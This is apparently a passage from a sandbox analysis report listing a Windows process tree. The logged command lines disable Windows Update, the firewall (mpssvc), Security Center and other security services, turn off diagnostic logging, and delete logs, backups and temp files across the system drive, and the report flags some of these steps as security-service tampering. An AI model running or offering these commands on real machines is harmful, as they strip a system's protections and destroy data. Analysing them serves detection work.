Reg.exe add "HKCU\SOFTWARE\Microsoft\GameBar" /v "GamePanelStartupTipIndex" /t REG_DWORD /d "3" /f
3⤵
PID:4440

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\GameBar" /v "ShowStartupPanel" /t REG_DWORD /d "0" /f
2⤵
PID:4232

C:\Windows\system32\reg.exe
Reg.exe add "HKCU\SOFTWARE\Microsoft\GameBar" /v "ShowStartupPanel" /t REG_DWORD /d "0" /f
3⤵
PID:4972

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\GameBar" /v "UseNexusForGameBarEnabled" /t REG_DWORD /d "0" /f
2⤵
PID:2228

C:\Windows\system32\reg.exe
Reg.exe add "HKCU\SOFTWARE\Microsoft\GameBar" /v "UseNexusForGameBarEnabled" /t REG_DWORD /d "0" /f
3⤵
PID:2116

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\GameDVR" /v "AppCaptureEnabled" /t REG_DWORD /d "0" /f
2⤵
PID:4048

C:\Windows\system32\reg.exe
Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\GameDVR" /v "AppCaptureEnabled" /t REG_DWORD /d "0" /f
3⤵
PID:4768

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe delete "HKCU\System\GameConfigStore" /v "Win32_AutoGameModeDefaultProfile" /f
2⤵
PID:3508

C:\Windows\system32\reg.exe
Reg.exe delete "HKCU\System\GameConfigStore" /v "Win32_AutoGameModeDefaultProfile" /f
3⤵
PID:3244

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe delete "HKCU\System\GameConfigStore" /v "Win32_GameModeRelatedProcesses" /f
2⤵
PID:3196

C:\Windows\system32\reg.exe
Reg.exe delete "HKCU\System\GameConfigStore" /v "Win32_GameModeRelatedProcesses" /f
3⤵
PID:3564

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_DSEBehavior" /t REG_DWORD /d "2" /f
2⤵
PID:692

C:\Windows\system32\reg.exe
Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_DSEBehavior" /t REG_DWORD /d "2" /f
3⤵
PID:888

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_DXGIHonorFSEWindowsCompatible" /t REG_DWORD /d "1" /f
2⤵
PID:1952

C:\Windows\system32\reg.exe
Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_DXGIHonorFSEWindowsCompatible" /t REG_DWORD /d "1" /f
3⤵
PID:2492

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_EFSEFeatureFlags" /t REG_DWORD /d "0" /f
2⤵
PID:2208

C:\Windows\system32\reg.exe
Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_EFSEFeatureFlags" /t REG_DWORD /d "0" /f
3⤵
PID:1412

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_Enabled" /t REG_DWORD /d "0" /f
2⤵
PID:5108

C:\Windows\system32\reg.exe
Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_Enabled" /t REG_DWORD /d "0" /f
3⤵
PID:3528

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_FSEBehavior" /t REG_DWORD /d "2" /f
2⤵
PID:5092

C:\Windows\system32\reg.exe
Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_FSEBehavior" /t REG_DWORD /d "2" /f
3⤵
PID:3564

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_FSEBehaviorMode" /t REG_DWORD /d "2" /f
2⤵
PID:5104

C:\Windows\system32\reg.exe
Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_FSEBehaviorMode" /t REG_DWORD /d "2" /f
3⤵
PID:1880

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_HonorUserFSEBehaviorMode" /t REG_DWORD /d "1" /f
2⤵
PID:2932

C:\Windows\system32\reg.exe
Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_HonorUserFSEBehaviorMode" /t REG_DWORD /d "1" /f
3⤵
PID:3100

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\GameDVR" /v "AllowGameDVR" /t REG_DWORD /d "0" /f
2⤵
PID:3856

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\GameDVR" /v "AllowGameDVR" /t REG_DWORD /d "0" /f
3⤵
PID:3552

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\default\ApplicationManagement\AllowGameDVR" /v "value" /t REG_DWORD /d "0" /f
2⤵
PID:1064

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\default\ApplicationManagement\AllowGameDVR" /v "value" /t REG_DWORD /d "0" /f
3⤵
PID:4688

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe delete "HKCU\SYSTEM\GameConfigStore\Children" /f
2⤵
PID:2424

C:\Windows\system32\reg.exe
Reg.exe delete "HKCU\SYSTEM\GameConfigStore\Children" /f
3⤵
PID:3404

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe delete "HKCU\SYSTEM\GameConfigStore\Parents" /f
2⤵
PID:4440

C:\Windows\system32\reg.exe
Reg.exe delete "HKCU\SYSTEM\GameConfigStore\Parents" /f
3⤵
PID:2604

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /F /FI "IMAGENAME eq SystemSettings.exe"
2⤵
PID:2492

C:\Windows\system32\taskkill.exe
taskkill /F /FI "IMAGENAME eq SystemSettings.exe"
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3432

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c net stop wuauserv & net stop UsoSvc
2⤵
PID:3156

C:\Windows\system32\net.exe
net stop wuauserv
3⤵
PID:3684

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wuauserv
4⤵
PID:2780

C:\Windows\system32\net.exe
net stop UsoSvc
3⤵
PID:712

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop UsoSvc
4⤵
PID:3528

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\DoNotConnectToWindowsUpdateInternetLocations" /DISABLE
2⤵
PID:1752

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\WindowsUpdate\DoNotConnectToWindowsUpdateInternetLocations" /DISABLE
3⤵
PID:3832

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\SetDisableUXWUAccess" /DISABLE
2⤵
PID:404

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\WindowsUpdate\SetDisableUXWUAccess" /DISABLE
3⤵
PID:4648

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\ExcludeWUDriversInQualityUpdate" /DISABLE
2⤵
PID:2800

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\WindowsUpdate\ExcludeWUDriversInQualityUpdate" /DISABLE
3⤵
PID:3684

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate" /DISABLE
2⤵
PID:4496

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate" /DISABLE
3⤵
PID:3808

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Scan Static Task" /DISABLE
2⤵
PID:3828

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Scan Static Task" /DISABLE
3⤵
PID:3684

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Start Oobe Expedite Work" /DISABLE
2⤵
PID:2244

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Start Oobe Expedite Work" /DISABLE
3⤵
PID:2520

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Scan" /DISABLE
2⤵
PID:3180

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Scan" /DISABLE
3⤵
PID:3552

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\USO_UxBroker" /DISABLE
2⤵
PID:1492

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\USO_UxBroker" /DISABLE
3⤵
PID:5088

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\UpdateModelTask" /DISABLE
2⤵
PID:5104

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\UpdateModelTask" /DISABLE
3⤵
PID:848

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WaaSMedic\PerformRemediation" /DISABLE
2⤵
PID:404

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\WaaSMedic\PerformRemediation" /DISABLE
3⤵
PID:5008

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
2⤵
PID:2624

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
3⤵
PID:1132

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:4324

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv" /v "Start" /t REG_DWORD /d "4" /f
3⤵
- Modifies security service
PID:4232

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:5056

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:3508

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsoSvc" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:2720

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsoSvc" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:3088

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:3636

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:1568

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DoSvc" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:764

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DoSvc" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:4784

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c rd /s /q C:\Windows\SoftwareDistribution
2⤵
PID:1428

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c md C:\Windows\SoftwareDistribution
2⤵
PID:4876

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PrintNotify" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:2712

C:\Windows\system32\reg.exe
Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PrintNotify" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:3008

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:2004

C:\Windows\system32\reg.exe
Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:4516

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c for /f %i in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "PrintWorkflowUserSvc" ^| find /i "PrintWorkflowUserSvc"') do (reg add "%i" /v "Start" /t reg_dword /d "4" /f)
2⤵
PID:1268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "PrintWorkflowUserSvc" | find /i "PrintWorkflowUserSvc"
3⤵
PID:4588

C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "PrintWorkflowUserSvc"
4⤵
PID:1008

C:\Windows\system32\find.exe
find /i "PrintWorkflowUserSvc"
4⤵
PID:3092

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PrintWorkflowUserSvc" /v "Start" /t reg_dword /d "4" /f
3⤵
PID:1412

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PrintWorkflowUserSvc_1a0b5" /v "Start" /t reg_dword /d "4" /f
3⤵
PID:4520

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InstallService" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:436

C:\Windows\system32\reg.exe
Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InstallService" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:3212

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PushToInstall" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:2204

C:\Windows\system32\reg.exe
Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PushToInstall" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:3368

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c for /f %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "UnistoreSvc" ^| find /i "UnistoreSvc"') do (reg add "%I" /v "Start" /t reg_dword /d "4" /f)
2⤵
PID:1056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "UnistoreSvc" | find /i "UnistoreSvc"
3⤵
PID:3996

C:\Windows\system32\find.exe
find /i "UnistoreSvc"
4⤵
PID:5092

C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "UnistoreSvc"
4⤵
PID:4900

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UnistoreSvc" /v "Start" /t reg_dword /d "4" /f
3⤵
PID:2464

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UnistoreSvc_1a0b5" /v "Start" /t reg_dword /d "4" /f
3⤵
PID:4828

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ClipSVC" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:3900

C:\Windows\system32\reg.exe
Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ClipSVC" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:1988

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VaultSvc" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:5108

C:\Windows\system32\reg.exe
Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VaultSvc" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:4660

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\StorSvc" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:1684

C:\Windows\system32\reg.exe
Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\StorSvc" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:4580

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:5024

C:\Windows\system32\reg.exe
Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:2568

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:4104

C:\Windows\system32\reg.exe
Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t REG_DWORD /d "4" /f
3⤵
- Modifies security service
PID:2484

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mpssvc" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:2504

C:\Windows\system32\reg.exe
Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mpssvc" /v "Start" /t REG_DWORD /d "4" /f
3⤵
- Modifies security service
PID:3564

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UmRdpService" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:2320

C:\Windows\system32\reg.exe
Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UmRdpService" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:1880

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasAuto" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:1412

C:\Windows\system32\reg.exe
Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasAuto" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:2172

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:4304

C:\Windows\system32\reg.exe
Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:5008

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EntAppSvc" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:1960

C:\Windows\system32\reg.exe
Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EntAppSvc" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:4800

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SessionEnv" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:2736

C:\Windows\system32\reg.exe
Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SessionEnv" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:4828

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\pla" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:3840

C:\Windows\system32\reg.exe
Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\pla" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:2340

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TroubleshootingSvc" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:1040

C:\Windows\system32\reg.exe
Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TroubleshootingSvc" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:3488

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WerSvc" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:432

C:\Windows\system32\reg.exe
Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WerSvc" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:3012

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DPS" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:4372

C:\Windows\system32\reg.exe
Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DPS" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:1944

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\diagnosticshub.standardcollector.service" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:928

C:\Windows\system32\reg.exe
Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\diagnosticshub.standardcollector.service" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:4920

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DiagLog" /v "Start" /t "reg_dword" /d "0" /f
2⤵
PID:2616

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DiagLog" /v "Start" /t "reg_dword" /d "0" /f
3⤵
PID:2780

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\WdiContextLog" /v "Start" /t reg_dword /d "0" /f
2⤵
PID:3528

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\WdiContextLog" /v "Start" /t reg_dword /d "0" /f
3⤵
PID:4488

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB" /t REG_DWORD /d "0x33554432" /f
2⤵
PID:64

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB" /t REG_DWORD /d "0x33554432" /f
3⤵
PID:4900

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShellHWDetection" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:3108

C:\Windows\system32\reg.exe
Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShellHWDetection" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:4828

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:2464

C:\Windows\system32\reg.exe
Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:1988

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SEMgrSvc" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:448

C:\Windows\system32\reg.exe
Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SEMgrSvc" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:2804

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DusmSvc" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:3308

C:\Windows\system32\reg.exe
Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DusmSvc" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:4580

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c del /s /f /q %SYSTEMDRIVE%\Windows\Temp\*.*
2⤵
PID:1324

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c rd /s /q %SYSTEMDRIVE%\Windows\Temp
2⤵
PID:4732

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c md C:\Windows\Temp
2⤵
PID:3008

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c del /s /f /q %temp%\*.*
2⤵
PID:2424

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c rd /s /q %temp%
2⤵
PID:2356

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c md %temp%
2⤵
PID:2492

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c del /q /f /s %SYSTEMDRIVE%\Temp\*.*
2⤵
PID:4964

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c del /q /f /s %SYSTEMDRIVE%\*.log
2⤵
PID:4028

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c del /q /f /s %SYSTEMDRIVE%\*.bak
2⤵
PID:3372

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c del /q /f /s %SYSTEMDRIVE%\*.gid
2⤵
PID:2340

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319" /DISABLE
2⤵
PID:2320

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319" /DISABLE
3⤵
PID:4732

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64" /DISABLE
2⤵
PID:1056

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64" /DISABLE
3⤵
PID:3108

C:\Windows\System32\cmd.exe
